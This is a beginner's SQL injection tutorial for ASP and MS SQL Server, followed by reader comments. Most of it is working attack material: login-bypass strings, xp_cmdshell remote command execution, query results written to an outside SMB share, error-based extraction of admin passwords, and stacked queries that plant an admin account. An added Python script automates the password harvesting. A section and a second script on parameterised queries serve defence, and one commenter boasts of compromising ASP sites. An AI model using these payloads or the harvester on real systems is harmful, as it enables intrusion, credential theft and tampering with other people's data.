The following article will try to help beginners grasp the problems they face when trying to use SQL Injection techniques, how to use them successfully, and how to protect themselves from such attacks.
Credit:
The information has been provided by SK.
1.0 Introduction
When a machine has only port 80 open, your most trusted vulnerability scanner returns nothing useful, and you know that the admin always patches his server, you have to turn to web hacking. SQL injection is a type of web hacking that requires nothing but port 80, and it might just work even if the admin is patch-happy. It attacks the web application itself (ASP, JSP, PHP, CGI, etc.) rather than the web server or the services running on the OS.
This article does not introduce anything new; SQL injection has been widely written about and used in the wild. We wrote it because we wanted to document some of our pen-tests using SQL injection and hope that it may be of some use to others. You may find a trick or two, but please check "9.0 Where can I get more info?" for the people who truly deserve credit for developing many of the techniques in SQL injection.
1.1 What is SQL Injection?
It is a trick to inject SQL queries or commands as input, typically via web pages. Many web pages take parameters from the user and build an SQL query to the database from them. Take a login page, for instance: it takes a user name and password and runs an SQL query against the database to check whether that combination is valid. With SQL Injection, it is possible to send a crafted user name and/or password that changes the SQL query and thus grants us something else.
1.2 What do you need?
Any web browser.
2.0 What should you look for?
Try to look for pages that allow you to submit data, i.e. login pages, search pages, feedback forms, etc. Sometimes HTML pages use the POST method to send parameters to another ASP page, so you may not see the parameters in the URL. However, you can view the HTML source and look for the "FORM" tag. You may find something like this:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Everything between <FORM> and </FORM> is a potential parameter that might be useful (exploit-wise), hidden fields included.
2.1 What if you can't find any page that takes input?
Look for ASP, JSP, CGI, or PHP pages, and especially for URLs that take parameters, like:
http://duck/index.asp?id=10
3.0 How do you test if it is vulnerable?
Start with the single quote trick. Input something like:
hi' or 1=1--
into the login field, the password field, or even the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, save the HTML source of the page to your hard disk, change the form action to the absolute URL, edit the hidden field's value, then open the saved page and submit it. Example:
<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>
If luck is on your side, you will be logged in without a valid login name or password.
3.1 But why ' or 1=1--?
Let us look at another example of why ' or 1=1-- is important. Other than bypassing login, it also makes it possible to view information that is not normally available. Take an ASP page that links you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name and 'food' is the value assigned to it. To perform the lookup, the ASP page might contain the following code (this is the actual code we created for this exercise):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our input is copied into v_cat and concatenated into the SQL string, so the statement becomes:
SELECT * FROM product WHERE PCategory='food'
The query returns a resultset containing one or more rows that match the WHERE condition, in this case PCategory equal to 'food'.
Now assume that we change the URL to something like this:
http://duck/index.asp?category=food' or 1=1--
Our variable v_cat now equals "food' or 1=1-- ", and if we substitute this in the SQL query we get:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query now selects everything from the product table regardless of whether PCategory equals 'food'. The double dash "--" tells MS SQL Server to ignore the rest of the line, which gets rid of the hanging single quote ('). On MySQL the line comment is a single hash "#" (a double dash there must be followed by a space), so sometimes you will have to use that instead.
However, if it is not SQL Server, or you simply cannot comment out the rest of the query, you may also try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
Here the injected text closes the quote itself, so nothing is left dangling, and it returns the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
4.0 How do I get remote execution with SQL injection?
Being able to inject SQL commands usually means we can execute any SQL statement at will. A default installation of MS SQL Server (at the time of writing) runs the service as LocalSystem, which is equivalent to Administrator access on Windows, and web applications frequently connect with a login in the sysadmin role such as 'sa'. In that case we can use extended stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using a double quote (") if the single quote (') is not working.
The semicolon ends the current SQL statement and thus allows you to start a new one. Because the page will not show you the output of xp_cmdshell, you need an out-of-band signal to verify that the command ran: on 10.10.1.2, listen for ICMP packets and check whether any arrive from the server:
# tcpdump icmp
If you do not get any ping requests from the server and get an error message indicating a permission problem, the administrator has probably limited the web user's access to these stored procedures (by default only members of the sysadmin role may execute xp_cmdshell).
5.0 How to get the output of my SQL query?
It is possible to use sp_makewebtask to write the result of your query into an HTML file on a share you control:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
For this to work the SQL Server machine must be able to reach 10.10.1.3 over SMB, and the folder "share" must be shared with write access for Everyone, since the file is written by the account the SQL Server service runs as.
6.0 How to get data from the database using ODBC error messages
We can use the information in the error messages produced by MS SQL Server to get almost any data we want. This depends on the application returning raw database errors to the browser. Take the following page for example:
http://duck/index.asp?id=10
We will try to UNION the integer 10 with a string from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
The system view INFORMATION_SCHEMA.TABLES contains information about all tables in the database. The TABLE_NAME field obviously contains the name of each table. It was chosen because we know it always exists. Our query:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
returns the first table name in the database. When we UNION this string value with the integer 10, the first column of the original SELECT is an int, so MS SQL Server tries to convert the string (nvarchar) to an integer. This fails, since 'table1' is not a number, and the server displays the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
The error message is nice enough to tell us the value that could not be converted. In this case we have obtained the first table name in the database, which is "table1".
To get the next table name, we can use the following query:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
We can also search for names using the LIKE keyword:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
The matching pattern '%25login%25' is seen by SQL Server as %login%, because %25 is the URL encoding of the percent sign. In this case we get the first table name that matches the criteria, "admin_login".
6.1 How to mine all column names of a table?
We can use another useful view, INFORMATION_SCHEMA.COLUMNS, to map out all the column names of a table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Now that we have the first column name, we can use NOT IN () to get the next one:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
Continuing, we obtain the rest of the column names, i.e. "password" and "details". We know we have them all when the conversion error no longer appears; in this exercise the page instead returned the following error once every column was excluded:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id','login_name','password','details')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
6.2 How to retrieve any data we want?
Now that we have identified some important tables and their columns, we can use the same technique to gather any information we want from the database.
Let's get the first login_name from the "admin_login" table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
We can now log in as "neo" with his password "m4trix".
6.3 How to get numeric string values?
There is a limitation to the technique described above. We cannot get an error message if the text we are retrieving consists only of digits (characters 0-9), because such a string converts to an integer successfully. Say we are trying to get the password of "trinity", which is "31173":
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
We will probably get a "Page Not Found" error or just the normal page. The reason is that the password "31173" is converted to a number before the UNION with the integer (10 in this case). Since the UNION is then valid, SQL Server does not throw an ODBC error, and we are unable to retrieve any purely numeric entry this way.
To solve this problem, we can append some letters to the numeric string to make sure the conversion fails. Let us try this query instead:
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
We simply use the plus sign (+) to append any text we want to the password. The plus has to be URL-encoded as %2b (its ASCII code is 0x2b) because a literal + in a URL is decoded as a space. We append '(space)morpheus' to the actual password, so even a numeric string like '31173' becomes '31173 morpheus'. By explicitly calling convert() to turn '31173 morpheus' into an integer, we make SQL Server throw the ODBC error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
Now you can log in as 'trinity' with the password '31173'.
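The enumeration in sections 6.0 to 6.3 is a loop: inject, read the leaked value out of the conversion error, add it to the NOT IN list, and repeat until no error comes back. The following is an added example, not code from the original article, that automates that loop in Python. It applies the convert(int, column + ' morpheus') trick from 6.3 on every round so that numeric strings are leaked as well, and URL-encodes the payload so the + travels as %2b. Because no vulnerable server is available offline, fake_send is a constructed stand-in that understands only the payloads this script produces and answers with the ODBC error text quoted above; against a real target you would replace it with a function that fetches http://duck/index.asp?id=<encoded payload> and returns the response body. The table names, columns and rows in FAKE_DB are constructed sample data, not anything taken from a real system.

```python
import re
from urllib.parse import quote, unquote

# Error text quoted in the article; group 1 is the leaked value.
LEAK = re.compile(r"converting the nvarchar value '(.*?)' to a column of data type int")
# Appended to every value so that purely numeric strings also fail the int conversion (6.3).
SUFFIX = " morpheus"


def build_payload(base_id, column, table, where=None, excluded=()):
    """Unencoded injection for one round of the NOT IN walk (sections 6.0-6.3)."""
    conds = []
    if where:
        conds.append(where)
    if excluded:
        quoted = ", ".join("'" + v.replace("'", "''") + "'" for v in excluded)
        conds.append(f"{column} NOT IN ({quoted})")
    sql = f"{base_id} UNION SELECT TOP 1 convert(int, {column}+'{SUFFIX}') FROM {table}"
    if conds:
        sql += " WHERE " + " AND ".join(conds)
    return sql + "--"


def harvest(send, base_id, column, table, where=None, limit=100):
    """Walk every value of table.column, one error message per round.

    send(encoded_payload) must return the HTTP response body. Against a real
    target it would GET http://duck/index.asp?id=<encoded_payload> (assumed URL).
    """
    found = []
    while len(found) < limit:
        payload = build_payload(base_id, column, table, where, found)
        # '+' must travel as %2B: a literal '+' in a URL decodes to a space.
        body = send(quote(payload, safe="=/,()'"))
        m = LEAK.search(body)
        if not m:
            break  # no conversion error: nothing left to leak (or the query broke)
        value = m.group(1)
        if value.endswith(SUFFIX):
            value = value[: -len(SUFFIX)]
        found.append(value)
    return found


# --- Constructed stand-in for the vulnerable page; NOT a real server ---------
FAKE_DB = {
    "INFORMATION_SCHEMA.TABLES": [
        {"TABLE_NAME": "table1"}, {"TABLE_NAME": "admin_login"}, {"TABLE_NAME": "product"},
    ],
    "INFORMATION_SCHEMA.COLUMNS": [
        {"TABLE_NAME": "admin_login", "COLUMN_NAME": "login_id"},
        {"TABLE_NAME": "admin_login", "COLUMN_NAME": "login_name"},
        {"TABLE_NAME": "admin_login", "COLUMN_NAME": "password"},
        {"TABLE_NAME": "admin_login", "COLUMN_NAME": "details"},
        {"TABLE_NAME": "product", "COLUMN_NAME": "PCategory"},
    ],
    "admin_login": [
        {"login_name": "neo", "password": "m4trix"},
        {"login_name": "trinity", "password": "31173"},
    ],
}
PAYLOAD = re.compile(r"convert\(int, (\w+)\+'[^']*'\) FROM ([\w.]+)(?: WHERE (.*))?--$")
ODBC_ERROR = ("Microsoft OLE DB Provider for ODBC Drivers error '80040e07'\n"
              "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting "
              "the nvarchar value '{}' to a column of data type int.\n/index.asp, line 5")


def fake_send(encoded_payload):
    """Mimic MS SQL: the first row of the UNIONed SELECT fails the int conversion."""
    m = PAYLOAD.search(unquote(encoded_payload))
    if m is None:
        return "<html>Page Not Found</html>"
    column, table, where = m.group(1), m.group(2), m.group(3) or ""
    rows = FAKE_DB[table]
    for cond in where.split(" AND "):
        if " NOT IN " in cond:
            col, lst = cond.split(" NOT IN ")
            excl = {v.replace("''", "'") for v in re.findall(r"'((?:[^']|'')*)'", lst)}
            rows = [r for r in rows if r[col] not in excl]
        elif cond:
            col, lit = cond.split("=")
            rows = [r for r in rows if r[col] == lit.strip("'")]
    if not rows:
        return "<html>product 10</html>"  # empty UNION half: the page renders normally
    return ODBC_ERROR.format(rows[0][column] + SUFFIX)


if __name__ == "__main__":
    print("tables:", harvest(fake_send, "10", "TABLE_NAME", "INFORMATION_SCHEMA.TABLES"))
    print("admin_login columns:", harvest(fake_send, "10", "COLUMN_NAME",
                                          "INFORMATION_SCHEMA.COLUMNS", "TABLE_NAME='admin_login'"))
    print("trinity:", harvest(fake_send, "10", "password", "admin_login", "login_name='trinity'"))
```

The loop stops on the first response without a conversion error, which is also what you see when the application hides database errors behind a custom error page; in that case the technique in this section no longer applies and you need a blind approach instead.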
7.0 How to update/insert data into the database?
Once we have gathered all the column names of a table, it is possible to UPDATE or even INSERT a new record. These are stacked queries: the semicolon ends the page's own statement, so the page will usually render normally and you confirm the change by logging in. For example, to change the password for "neo":
http://duck/index.asp?id=10; UPDATE admin_login SET password='newpas5' WHERE login_name='neo'--
To INSERT a new record into the table:
http://duck/index.asp?id=10; INSERT INTO admin_login (login_id, login_name, password, details) VALUES (666,'neo2','newpas5','NA')--
We can now log in as "neo2" with the password "newpas5".
8.0 How to avoid SQL Injection?
The root cause is building SQL text by concatenating untrusted input, so the primary fix is to stop doing that: pass user input to the database as parameters (bind variables) of a prepared statement or of a parameterised stored procedure, so that a quote in the input is data rather than syntax. A stored procedure that builds dynamic SQL from its arguments gives no protection.
If you must filter, reject or escape characters like the single quote, double quote, slash, backslash, semicolon, and extended characters like NUL, carriage return, new line, etc., in all strings from:
- Input from users
- Parameters from the URL
- Values from cookies
For numeric values, convert the input to an integer before placing it in the SQL statement. ISNUMERIC is a weak test (it accepts values such as '1e3', '$' or ','), so an explicit integer conversion in the application is the safer check.
Change the account under which SQL Server starts and runs ("Startup and run SQL Server" in the SQL Server Security tab) to a low-privilege user, so an injected command does not run as SYSTEM.
Delete, or at least revoke public access to, stored procedures that you are not using, like:
master..xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
Finally, do not return raw database error messages to the browser; everything in section 6.0 depends on them.
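Sections 3.0 to 3.1 and 8.0 can be seen side by side in the following added example, which is not code from the original article: the vulnerable lookups build the SQL string exactly the way the ASP snippet in 3.1 does, the hardened ones pass the same input as bind variables, and the numeric id is validated before it reaches the query. It uses Python's built-in sqlite3 in place of MS SQL Server (sqlite also treats -- as a line comment, so the article's payloads behave the same way), with a constructed admin_login/product database whose rows are assumptions chosen to match the article's illustrations.

```python
import re
import sqlite3


# Constructed sample database standing in for the article's MS SQL back end.
# Table and row contents are assumptions, chosen to match the article's examples.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE admin_login(login_id INTEGER, login_name TEXT, password TEXT, details TEXT);
        INSERT INTO admin_login VALUES (1, 'neo', 'm4trix', 'NA'), (2, 'trinity', '31173', 'NA');
        CREATE TABLE product(id INTEGER, PCategory TEXT, name TEXT);
        INSERT INTO product VALUES (1, 'food', 'apple'), (2, 'drink', 'water'), (3, 'toys', 'ball');
    """)
    return conn


def login_concat(conn, user, pw):
    """VULNERABLE: the same string concatenation as the ASP snippet in 3.1.
    hi' or 1=1-- in either field rewrites the WHERE clause and matches every row."""
    sql = (f"SELECT login_name FROM admin_login "
           f"WHERE login_name='{user}' AND password='{pw}'")
    return [row[0] for row in conn.execute(sql)]


def login_param(conn, user, pw):
    """HARDENED: bind variables. The SQL text is fixed; the driver hands the
    values to the engine separately, so a quote in them is just a character."""
    sql = "SELECT login_name FROM admin_login WHERE login_name=? AND password=?"
    return [row[0] for row in conn.execute(sql, (user, pw))]


def products_concat(conn, category):
    """VULNERABLE: the category lookup from 3.1."""
    sql = f"SELECT name FROM product WHERE PCategory='{category}'"
    return [row[0] for row in conn.execute(sql)]


def products_param(conn, category):
    """HARDENED: the same lookup with a bind variable."""
    sql = "SELECT name FROM product WHERE PCategory=?"
    return [row[0] for row in conn.execute(sql, (category,))]


def product_by_id(conn, raw_id):
    """Numeric parameter (8.0): accept only a plain integer, then bind it.
    Anything like '10 UNION SELECT ...' is rejected before it reaches SQL."""
    if not re.fullmatch(r"\d{1,9}", raw_id.strip()):
        raise ValueError("id must be a plain integer")
    sql = "SELECT name FROM product WHERE id=?"
    return [row[0] for row in conn.execute(sql, (int(raw_id),))]


if __name__ == "__main__":
    db = make_db()
    attack = "hi' or 1=1--"
    print("concatenated login:", login_concat(db, attack, "x"))    # every user
    print("parameterised login:", login_param(db, attack, "x"))    # no user
    print("concatenated category:", products_concat(db, "food' or 1=1--"))
    print("parameterised category:", products_param(db, "food' or 1=1--"))
    try:
        product_by_id(db, "10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--")
    except ValueError as err:
        print("rejected:", err)
```

The point of the contrast is that the hardened functions do not inspect the input at all: the statement shape is fixed before any user data is seen, which is why the character blacklist above is a fallback rather than the fix. The same holds for a stored procedure only if it is called with parameters and does not assemble dynamic SQL inside.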
9.0 Where can I get more info?
One of the earliest works on SQL Injection we have encountered is the paper by Rain Forest Puppy about how he hacked PacketStorm:
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6
A great article on gathering information from ODBC error messages:
http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc
A good summary of SQL Injection against various SQL servers:
http://www.owasp.org/asac/input_validation/sql.shtml
SensePost's article on SQL insertion:
http://www.sensepost.com/misc/SQLinsertion.htm
Other worthwhile reading:
http://www.digitaloffense.net/wargames01/IOWargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf

Subject: Good
Date: 24 Oct. 2005
From: pawankumar2k1 at yahoo dot com
This was a good topic, but it lacks one thing: if developers have applied the security measures against SQL Injection, then how do we inject SQL queries into web applications?

Subject: Useful Information
Date: 27 Oct. 2005
From: anon.
This guide is very useful information.

Subject: smart
Date: 9 Nov. 2005
From: ntnijeeshyahoo.com
This was a smart topic. But as a developer I want to learn more about how to tighten the security of my applications against injection.

Subject: uhh... you don't
Date: 11 Nov. 2005
From: anon.
If developers have applied the security measures to prevent SQL injection, then you can't inject SQL queries. It's something completely preventable by good coding practice, and it is usually only allowed when the developer is being lazy or sloppy.

Subject: for php and mysql
Date: 15 Nov. 2005
From: just me
There is a nice article that comes with a working solution for PHP+MySQL injection:
http://www.askbee.net/articles/php/SQL_Injection/sql_injection.html

Subject: Another discussion
Date: 21 Nov. 2005
From: Andrew
I discuss this subject with a basic introduction to SQL at the following address: http://andrew.absurdlycool.com/class/l7.html

Subject: Useful Information
Date: 5 Dec. 2005
From: Janner Simarmata
This was a good topic, but it lacks one thing: if developers have applied the security measures against SQL Injection, then how do we inject SQL queries into web applications?

Subject: twisted metal
Date: 5 Dec. 2005
From: Animemouse
Although the developers have applied the security measures, we can still shift the code to another angle. Just be creative, but it will take time though.

Subject: very good one
Date: 7 Dec. 2005
From: eby
This is an excellent article. Thanks a lot.

Subject: Good article but...
Date: 16 Dec. 2005
From: shareefer
Great article, except for one thing. As a matter of prevention, you should ALWAYS use stored procedures in your web code.
Stored procedures interpret their parameters literally even if they contain SQL code, so all SQL injections are blocked... simple as that. No need for checking for dashes, quotes, SQL keywords, etc.

Subject: What The Doors Locked
Date: 26 Dec. 2005
From: Dark Pontifex
Great article for SQL Injection.

Subject: good for beginners
Date: 27 Dec. 2005
From: la
A good beginning to understanding. Thanks.

Subject: good information
Date: 29 Dec. 2005
From: sponsbobspyahoo.com
Good tutorial, thank you.

Subject: Thank you for the information
Date: 4 Jan. 2006
From: Padrino123
This article really helped me. Thanks for the information.

Subject: Really Nice article
Date: 9 Jan. 2006
From: Uppalapati Giri Prasad
This article is really clear enough to understand the concept, and rich enough in information to implement an example. Thanks for publishing such a good article.

Subject: quite well
Date: 18 Jan. 2006
From: rajgremo_u_rajyahoo.com
This is well architected data. Thank you for giving the data.

Subject: Stored Procs are not guaranteed protection
Date: 18 Jan. 2006
From: dbjstein
In response to the note above, I do not believe it is the case that stored procedures prevent SQL injection in all cases. Stored procedures are frequently set up to contain dynamic SQL, where the statement is constructed at runtime. In those cases there is no precompiled statement, and therefore no prevention of SQL injection techniques. Only if the stored procedure contains a defined SQL statement with bind variables or parameters to be parsed into the statement will it prevent SQL injection.

Subject: Is it possible!!
Date: 19 Jan. 2006
From: Deepak
SQL Injection is not possible in stored procedures... so it is the easiest way to prevent SQL injection. Is any type of hacking possible when using stored procedures?!!

Subject: Very good article
Date: 19 Jan. 2006
From: Deepak
It's a very nice article and I'm expecting more like this...

Subject: very good topic to read
Date: 19 Jan. 2006
From: prashant
It is useful for teaching what SQL Injection is.

Subject: say so..
Date: 21 Jan. 2006
From: Burner
This article is so useful, especially for those who are new to application development, database design, database administration, web server administration, etc., and of course it is a reminder for all of us. But there is a problem: bad users can use this information to launch attacks against certain places, so this type of article is in one way good and in one way bad...
Should we put this kind of information on public sites????
Thanks

Subject: Good Article
Date: 24 Jan. 2006
From: Bob
This is one of the best articles I have ever seen about SQL Injection...
But in one way I do agree with Burner about whether to keep these sorts of articles on public sites.

Subject: Why hide them from public eyes
Date: 29 Jan. 2006
From: Dogman
These things shouldn't be hidden from public eyes. There are a lot of developers that have never heard about this concept and are writing injectable web applications. Also, there are a lot of people that are using those applications. This is very good material and every developer should read it. Also, every developer should read about securing their applications. Too bad they don't. I've met people with much more experience than me maintaining that stored procs are slower than calling the query straight from your application, and so on.
I hope you all got my point.

Subject: good
Date: 2 Feb. 2006
From: alir9
Today we have some web applications that still don't patch the 'or' trick in the login page!!! This article was good, but there are some differences between MS SQL and MySQL and no one explained them!

Subject: great job dude
Date: 4 Feb. 2006
From: Kevo
I really enjoyed reading this a lot. Thanks man!!

Subject: none
Date: 9 Feb. 2006
From: anon
With login pages, don't most people store encrypted passwords using some sort of server-side function to decrypt or compare? How would injection get past that for logging in? Just curious, because I tried the stuff in this article and wasn't able to log in to a site I run, but I would like to fix the hole if this is still possible another way.

Subject: Variance in SQL server error messages
Date: 10 Feb. 2006
From: redeye
I tried testing this on a site, using something similar to:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
Instead of the useful
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
I get this:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting character string to smalldatetime data type.
/titlenews.inc, line 46
Is this a newer version of SQL Server or a differently configured one, one which deliberately does not output the useful data?

Subject: bind variables
Date: 10 Feb. 2006
From: seph
How is using stored procedures going to prevent this?
... you just need to make sure you use bind variables.

Subject: great but much brief
Date: 14 Feb. 2006
From: neido
Yeah, it contains cool stuff, but you have to make it more user friendly than this.

Subject: COMMON
Date: 15 Feb. 2006
From: hay
This trick is common. I should find better ones.

Subject: SQL injection sux
Date: 21 Feb. 2006
From: White HaCker
I prefer LKM rootkit attacks for Sun servers.
This could be used as a kernel hacking trick.
Just like the way I used to code buffer overflows for Unix servers...

Subject: Php injection
Date: 22 Feb. 2006
From: whisker
Has any PHP site fallen to SQL Injection? I read an article saying that only .asp and .cfm will fall easily to SQL Injection. Let me know some comments on this. If anyone did SQL Injection on a PHP site please let me know; I have taken down many ASP sites with SQL injection.

Subject: devakishore at yahoo.com
Date: 22 Feb. 2006
From: etterdev
We can know whether the site is vulnerable to SQL injection or not by the way they handle the errors, but how do we know which backend database the site is running? Is there any tool for knowing that?

Subject: nice article to get to know SQL injection
Date: 3 Mar. 2006
From: Ashvinbodhale
The attack can be foiled by already developed apps and also stored procs that are embedded inside code; all work well.
Check this URL: http://www.askbee.net/articles/php/SQL_Injection/sql_injection.html

Subject: Nice tutorial
Date: 7 Mar. 2006
From: cream_shady4uyahoo.com
The tutorial fairly teaches hacking through SQL injection and preventive measures, but what if web applications are running another database different from SQL Server?

Subject: works on any database
Date: 10 Mar. 2006
From: Spotty-faced Git
This is an attack that works on any database backend, not just SQL Server. You just have to replace the INFORMATION_SCHEMA table names with the appropriate system table names for the product you are working against. A SQL Injection attack is a result of manipulating the standard SQL query language (used by nearly all DB products) and bad coding practices by the web developer. It's completely DB agnostic at its basic level.

Subject: how do you use this
Date: 12 Mar. 2006
From: oLi
I tried to use this on a forum and it did nothing????

Subject: what about this solution
Date: 15 Mar. 2006
From: da_man
I tested a forum made by a friend and his login looked kinda like this (shortened down a bit):
$query_1 = mysql_query("SELECT * FROM ".$tpref."users WHERE UserName = '$_POST[usern]' AND PassWord = '$_POST[passwd]'");
//check login
if (mysql_num_rows($query_1) == 1){
// do login stuff
} else {
// print error msg
}
How safe is that against SQL injection?

Subject: Not very safe...
Date: 21 Mar. 2006
From: Nick Goloborodko
At the very least, what you need to do is check the input and escape/remove all of the SQL special characters. Also, consider using SPs.
Kind regards,
Nick Goloborodko

Subject: Very Rich in Knowledge - Really Interesting
Date: 21 Mar. 2006
From: Jabir Hussain
This is really rich in knowledge. It helped me a lot to secure my applications.

Subject: interesting
Date: 29 Mar. 2006
From: pro
Definitely makes you hungry for more information. I wonder where you could get a class in these techniques?

Subject: this is my query... what can you send in the user name or password to inject this?
Date: 30 Mar. 2006
From: Elad
strsql = "SELECT username, password " +
"FROM Agents " +
"WHERE (username = N'" + _UserName.ToString() + "') AND (password = N'" + _Password + "')";

Subject: table names corresponding to different db
Date: 8 Apr. 2006
From: sumit
Can you tell me what the different system table names are in the context of different SQL servers?
E.g. what do I replace INFORMATION_SCHEMA.TABLES with in MySQL?
Thanks

Subject: what is the work of rank in sql injection
Date: 14 Apr. 2006
From: anobscase
I just want to know the work of rank in SQL injection.

Subject: Cool Stuff
Date: 5 May 2006
From: Anand
Good help for beginners, as a developer or security guy.

Subject: :-
Date: 8 May 2006
From: __ThE_BiG_DoG__
I get all that stuff, and I found out you can use Perl to access the SQL code in sites, but I can't work out how to see that :-s Any advice?

Subject: :) waw
Date: 12 May 2006
From: _Mt_DB_
I think this is good information for security.

Subject: With access DB
Date: 17 May 2006
From: tieulongnuxinh
I can't do it with an Access DB:
Microsoft JET Database Engine error '80004005'
Could not find file 'c:\windows\system32\inetsrv\INFORMATION_SCHEMA.mdb'.
/aboutus_content.asp, line 18

Subject: (,)
Date: 17 May 2006
From: wala lang
Thank you.

Subject: What about...
Date: 18 May 2006
From: ho
SQL interjections? Are they as bad or can we just kinda ignore them?

Subject: GoOD Article..
Date: 22 May 2006
From: Kumarkumskumar_005yahoo.com
Hi,
This is one of the good articles which I found. I hope all developers will read this article.
May I expect some more SQL Injection with examples?

Subject: Wonderful article
Date: 5 Jun. 2006
From: Dev
Fine article for beginners...

Subject: Good one
Date: 6 Jun. 2006
From: Kalyani
Good article!!

Subject: Good Article
Date: 8 Jun. 2006
From: Ramzan
Best article, but I think this should be hidden from mischievous people.

Subject: Excellent!
Date: 8 Jun. 2006
From: israelagnouhyattarahotmail.com
It's a shame not too many PHP+SQL admins limit how the client manipulates database data through injections. They worry too much about patching applications (which is not bad), but they should also consider focusing on these attacks, as they have proven to be extremely handy when everything is patched up.

Subject: Cool Stuff
Date: 13 Jun. 2006
From: habib.khalidhotmail.com
It's a nice article for every web developer; they should take care of SQL injection in order to improve security.

Subject: what about port 443
Date: 20 Jun. 2006
From: Jeffro
Would this work the same if you were utilizing port 443 vs. port 80???

Subject: Really Interesting!!!!!!
Date: 21 Jun. 2006
From: skjha2000rediffmail.com
Really interesting and helpful topic for web-based application testing.
Regards,
Subodh Kumar Jha
Associate Test Engineer,
Aftek Infosys Ltd. +919823282061

Subject: Cool Stuff
Date: 29 Jun. 2006
From: Jasthi Adi Vishnu Murthy
Interesting and helpful topic on Replication.

Subject: Really Interesting
Date: 6 Jul. 2006
From: Somesh
Interesting and helpful topic for web-based application testing.

Subject: hello...
Date: 7 Jul. 2006
From: Renu
Hello there,
This article is really very helpful. Despite studying this concept for the very first time, I got clear on it to a very large extent. But being a software tester I must know this concept in detail. The projects I am currently working on use VB.NET, ASP.NET and SQL Server technology, so could any one of you tell me how this affects that combination? What are the things I have to test for in the case of SQL security?

Subject: Best Write Up to Date
Date: 7 Jul. 2006
From: UtmostBastard
